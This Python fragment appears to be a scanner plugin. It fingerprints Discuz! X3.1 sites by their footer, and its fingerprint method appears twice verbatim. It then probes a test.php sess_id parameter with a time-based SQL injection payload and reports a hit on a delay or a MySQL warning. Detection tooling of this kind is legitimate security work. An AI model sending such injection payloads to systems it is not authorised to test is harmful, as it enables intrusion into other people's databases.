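 def fingerprint(self, target):
     """Return True when *target* serves the Discuz! X3.1 "Powered by" footer.

     Resolves the host from ``target`` via ``util.getHostByUrl``, fetches it
     with ``util.sendHttpRequest`` and reports a match only for a 200
     response whose body contains the exact version marker.  Any other
     status, or a body without the marker, yields False.

     Two fixes over the previous version: a non-200 response used to fall
     off the end of the function (implicit None instead of False), and the
     marker was passed to ``re.search`` unescaped, so the dots in
     ``discuz.net`` / ``X3.1`` acted as wildcards.
     """
     url = target
     host = util.getHostByUrl(url)
     code, head, body, location, error = util.sendHttpRequest(host)
     if code != 200:
         return False
     # Plain substring test -- the marker is a literal, not a regex.
     # NOTE(review): this is a weak fingerprint; the footer is trivially
     # edited or removed by the site owner, so a False here does not prove
     # the target is not Discuz X3.1.
     marker = '<p>Powered by <strong><a href="http://www.discuz.net">Discuz!</a></strong> <em>X3.1</em></p>'
     return marker in body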
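 def fingerprint(self, target):
     """Return True when *target* serves the Discuz! X3.1 "Powered by" footer.

     Resolves the host from ``target`` via ``util.getHostByUrl``, fetches it
     with ``util.sendHttpRequest`` and reports a match only for a 200
     response whose body contains the exact version marker.  Any other
     status, or a body without the marker, yields False.

     Two fixes over the previous version: a non-200 response used to fall
     off the end of the function (implicit None instead of False), and the
     marker was passed to ``re.search`` unescaped, so the dots in
     ``discuz.net`` / ``X3.1`` acted as wildcards.
     """
     url = target
     host = util.getHostByUrl(url)
     code, head, body, location, error = util.sendHttpRequest(host)
     if code != 200:
         return False
     # Plain substring test -- the marker is a literal, not a regex.
     # NOTE(review): this is a weak fingerprint; the footer is trivially
     # edited or removed by the site owner, so a False here does not prove
     # the target is not Discuz X3.1.
     marker = '<p>Powered by <strong><a href="http://www.discuz.net">Discuz!</a></strong> <em>X3.1</em></p>'
     return marker in body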
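    def audit(self, target):
        """Probe ``/test.php?act=login&sess_id=`` on *target* for SQL injection.

        Issues one request (recorded as GET) whose ``sess_id`` value carries
        a time-based payload (``' and sleep(3)-- 1``) and reports a hit when
        the response is 200 and either
        (a) the body contains the MySQL warning fragment
            ``<b>Warning</b>:  INSERT INTO`` (error-based signal), or
        (b) the round trip took at least as long as the injected sleep
            (time-based signal).
        On a hit the finding is saved through ``self._addScanResult`` and
        True is returned; otherwise False.

        The previous timing check was effectively dead: ``time.clock()``
        measures CPU time on Unix (a server-side sleep adds none) and was
        removed in Python 3.8, and ``float in range(1, 3)`` is only true for
        exactly 1.0 or 2.0 -- never for a ~3 s delay (3 is not even in the
        range).  Wall-clock elapsed time is now compared against the sleep
        length that the payload actually requests.
        """
        # Seconds requested by the sleep(...) in the payload below; keep in sync.
        sleep_seconds = 3
        urlWithPayload = util.getHostByUrl(target) + '/test.php?act=login&sess_id=1%27%20and%20sleep%283%29--%201'
        # Wall-clock time, not CPU time: the delay we are looking for happens
        # on the remote side while this process is idle.
        start = time.time()
        code, head, body, location, error = util.sendHttpRequest(urlWithPayload)
        elapsed = time.time() - start
        if code != 200:
            return False
        error_based = body.find('<b>Warning</b>:  INSERT INTO') != -1
        # NOTE(review): a single timing sample false-positives on a slow or
        # overloaded host; a baseline request without the payload (or a repeat
        # with a different sleep value) would make this signal far more reliable.
        time_based = elapsed >= sleep_seconds
        if error_based or time_based:
            # Save the finding via the base class. _addScanResult() may be called
            # more than once when several vulnerable points are found.
            self._addScanResult({"method": "GET",  # HTTP verb of the request: GET/POST/HEAD
                "post_data": "",  # POST body carrying the payload, if the request were POST
                "url": urlWithPayload,  # URL carrying the payload
                "vul_key": "sess_id"})  # the vulnerable parameter
            return True
        return False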